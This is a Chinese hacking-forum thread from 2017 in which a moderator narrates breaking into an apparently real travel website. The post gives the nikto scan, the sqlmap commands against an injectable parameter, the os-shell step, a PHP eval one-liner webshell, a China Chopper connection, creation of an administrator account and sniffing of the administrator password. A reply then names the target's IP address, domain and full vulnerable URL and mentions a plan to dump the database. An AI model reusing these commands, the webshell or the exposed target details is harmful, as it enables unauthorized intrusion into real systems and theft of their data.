用户
搜索
  • TA的每日心情
    开心
    前天 15:45
  • 签到天数: 96 天

    连续签到: 1 天

    [LV.6]常住居民II

    版主

    Rank: 7Rank: 7Rank: 7

    55

    主题

    873

    帖子

    660

    魔法币
    收听
    3
    粉丝
    12
    注册时间
    2016-4-6

    燕幽默灌水王限定版春秋段子手i春秋签约作者

    发表于 2017-4-6 19:30:00 4653982
    本帖最后由 yangwen 于 2017-4-6 20:35 编辑

    前言:
           咳咳,雷迪森and杰特们,我这辈子写了很多故事,今天我给大家说一个,大家鼓掌!!!!
           我工作时候,闲的有点蛋疼,因为我这个人很向往旅游,心想看看旅游攻略吧。
          
    1.jpg
          美翻了有没有!!!!
          看着看着...我沉醉在这风景当中,我仿佛身临其境,深深的呼吸大自然的空气,多么清新,伴着鸟儿的叫声,一切都是那么美
             
         我的浑身鸡皮疙瘩都在起来了啊!!!!美美美啊~
          2.jpg

    下面进入正题
    网站收录有点小高啊 但是这对于爱zb的我来说 然并卵。
    QQ截图20170406175054.png
    首先 进行踩点工作 探测网站信息
    QQ截图20170406174838.png
    现在我们知道了网站是PHP5.4.20 dz x3.2版本 以及IP地址 服务器系统 用Apache搭建的
    漏洞扫描这方面 使用kali的nikto进行扫描
    [AppleScript] 纯文本查看 复制代码
    nikto -host  [url]www.xx.xx[/url]

    QQ截图20170406175329.png QQ截图20170406175354.png
    通过扫描 我们获取到了网站的敏感信息 不得不说一下 kali下 nikto 工具 不错的。
    QQ截图20170406175713.png
    扫描有点慢 扫描过程 这里就简单的说一下就行了 扫描到注入点后的注入过程

    注入点有两个参数 aid=19161&t=2  其中是用&分开的
    QQ截图20170406180252.png
    我们在后面 加入' 让他报错
    结果然并卵
    QQ截图20170406180406.png
    两个参数  这里我只测试aid这个参数
    在aid=19161 后面加入'
    报错了 如下图
    QQ截图20170406180514.png
    那么这就简单了 丢到sqlmap里面 去注入一波
    [AppleScript] 纯文本查看 复制代码
    sqlmap -u "http://www.xxxxx.com/2017xxx/news_nei.php?aid=19161&t=2" -p aid 

    -p参数的意思是 只让他注入aid这一个参数 也就是制定参数
    QQ截图20170406180821.png
    存在注入 并且已经注入出网站服务器的信息
    QQ截图20170406181110.png
    [AppleScript] 纯文本查看 复制代码
    web server operating system: Windows
    web application technology: Apache 2.2.22, PHP 5.4.20
    back-end DBMS: MySQL >= 5.0.12


    在后面加入 --users
    什么鬼??? root权限? 那么这就好说了 直接执行os-shell
    QQ截图20170406181221.png

    选择4 php
    成功上传一个脚本  熟悉的os-shell界面
    QQ截图20170406182034.png
    QQ截图20170406182122.png
    执行Windows系统命令
    QQ截图20170406182247.png
    列出目录
    QQ截图20170406182346.png

    写入一句话
    [AppleScript] 纯文本查看 复制代码
    os-shell> echo "<?php @eval($_POST[cmd]);?>" > D:\wwwroot\xxx\xxx\x.php


    菜刀连接之
    QQ截图20170406183654.png


    system权限 并且添加了用户到管理员权限
    QQ截图20170406185647.png
    QQ截图20170406185452.png
    使用4714 端口进行远程桌面连接

    登录服务器后通过嗅探密码 获得administrator密码
    QQ截图20170406191647.png

    administrator用户连接后 我发现了什么????
    QQ截图20170406192500.png
    这就可怕了
    6}`Q}VK5)GDQY[UUQ9EO4}7.jpg

    本次渗透到此为止了
    数据库管理密码还是弱口令= =





    发表于 2017-4-10 13:33:03
    你打码的确很犀利,但是还是被我找到网址了。
    执行windows系统命令泄露:
    117.xxx.xxx.1x5.xxx
    执行netstat -ano泄露:
    xxx.34.xxx.159
    合起来就是117.34.1x5.159
    看window系统命令的形状不是9就是0或者8
    猜了两次
    117.34.105.159正确打开官网http://xibeily.com/西北旅游网
    你注入的地方是
    http://xibeily.com/2017huiyi/news_nei.php?aid=19161&t=2
    写的很清楚啊。
    不过是二级目录,连dz二次开发都不算。。。
    更不属于dz论坛的注入,只不过他们这些站和二级目录都放在一个服务器里了,而且权限这么大。。拿下理所应当。本来准备脱裤的,但是这些少的可怜的数据我真是感觉不值得费工夫。
    好吧,以上都是我闲的无聊,我朋友让我发的。。你别理我就好了。
    使用道具 举报 回复
    明明可以用windows下的日常渗透工具拿下这个站你却用了kali可能你比较喜欢kali吧,其次你的踩点貌似没什么卵用。因为你是用注入日下的此站,注入点直接扔到sqlmap就会测试出服务器以及相关信息。当然ip只要手动查一下就行。真搞不懂一个这样的站为什么要用kali。
    使用道具 举报 回复
    发表于 2017-4-10 18:21:23
    yangwen 发表于 2017-4-10 17:55
    '直接报错  sqlmap一跑就知道

    我想问的是一个网站有那么多网页,你是怎么找到这个网页有注入点的,我也知道一些报错语句,但是总不能在每个页面都试试有没有注入点吧,所以在请教一下
    使用道具 举报 回复
    花无涯 发表于 2017-4-11 00:14
    明明可以用windows下的日常渗透工具拿下这个站你却用了kali可能你比较喜欢kali吧,其次你的踩点貌似没什么 ...

    孩子,多一点鼓励,少一点质疑,知识的分享是面向大众的,我觉得他做的很不错了
    使用道具 举报 回复
    发表于 2017-4-10 17:57:03
    0xyer 发表于 2017-4-10 13:33
    你打码的确很犀利,但是还是被我找到网址了。
    执行windows系统命令泄露:
    117.xxx.xxx.1x5.xxx

    小伙子头脑可以,我前面说过是二级目录,不属于dzcms的注入。
    不过你的心确实挺细的,加油。
    使用道具 举报 回复
    发表于 2017-4-11 09:28:16
    花无涯 发表于 2017-4-11 00:15
    而且你的点也白采了,找到注入以后你直接用os-shell拿了shell并提权。

    这个不奇怪啊,如果我一开始就知道有注入还能--os-shell我也肯定不踩点了。
    使用道具 举报 回复
    创想科技时代 版主 i春秋官方指定技术渣 i春秋认证
    沙发
    发表于 2017-4-6 20:05:32
    我就问你发帖会不会一卡一卡的
    生命必须要有裂缝,阳光才能照射进来
    使用道具 举报 回复
    发表于 2017-4-6 21:41:20
    运气真好哦
    使用道具 举报 回复
    小爱_Joker 版主 成大事者 不拘小节 楚 积极活跃奖 i春秋签约作者 爱心勋章
    地板
    发表于 2017-4-6 22:00:10
    厉害了
    使用道具 举报 回复
    发表于 2017-4-6 23:05:01
    这么顺利   竟然没有WAF
    使用道具 举报 回复
    发表于 2017-4-6 23:36:02
    有点懵逼  这是因为那个插件吗?dz的原声程序不会有这种的
    使用道具 举报 回复
    发表于 2017-4-6 23:41:24
    还是中国菜刀牛逼
    使用道具 举报 回复
    发表于 2017-4-7 09:16:54
    那个whatweb的求发一下,我再github上找的是探测cms信息的
    使用道具 举报 回复
    发表于 2017-4-7 09:42:30
    哪个版本的DZ居然还可以注入?
    使用道具 举报 回复
    发表于 2017-4-7 10:04:18
    taro 发表于 2017-4-7 09:42
    哪个版本的DZ居然还可以注入?

    注入是存在一个自定义的二级目录下,注入点不是发生在DZ的源码上。
    使用道具 举报 回复
    发表于 2017-4-7 12:52:03
    使用道具 举报 回复
    发表于 2017-4-7 16:34:28
    使用道具 举报 回复
    发表于 2017-4-8 16:22:53
    学习
    使用道具 举报 回复
    学习了
    使用道具 举报 回复
    发表于 2017-4-9 19:33:09
    看的不是很懂
    使用道具 举报 回复
    1234下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册